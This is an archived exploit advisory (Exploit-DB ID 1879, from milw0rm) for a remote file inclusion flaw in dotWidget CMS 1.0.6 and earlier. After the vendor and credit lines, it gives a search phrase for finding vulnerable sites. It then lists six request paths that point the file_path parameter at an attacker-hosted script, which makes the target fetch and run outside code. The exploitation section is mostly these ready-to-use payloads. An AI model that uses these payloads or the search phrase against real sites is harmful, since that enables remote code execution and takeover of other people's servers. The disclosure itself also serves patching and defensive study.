dotWidget CMS 1.0.6 - 'file_path' Remote File Inclusion

EDB-ID:

1879




Platform:

PHP

Date:

2006-06-05


Title: dotWidget CMS <= 1.0.6 - Remote File Include Vulnerability
-----------------------------------------------------------------
Vendor: dotWidget
URL: http://dotwigdet.com
-----------------------------------------------------------------

Credits:
Discovered by: 'Aesthetico'
http://www.majorsecurity.de
-----------------------------------------------------------------
Search for: "dotwidget Printer-friendly"
-----------------------------------------------------------------

Exploitation:

/index.php?file_path=http://www.yourspace.com/yourscript.php?
/feedback.php?file_path=http://www.yourspace.com/yourscript.php?
/printfriendly.php?file_path=http://www.yourspace.com/yourscript.php?

EvilCookie <dorshirl[at]zahav.net.il> submitted these extra file_path issues.

/includes/common.inc?file_path=http://www.yourspace.com/yourscript.php?
/includes/nav.inc?file_path=http://www.yourspace.com/yourscript.php?
/admin/dotwidgetc_config.php?file_path=http://www.yourspace.com/yourscript.php?

# milw0rm.com [2006-06-05]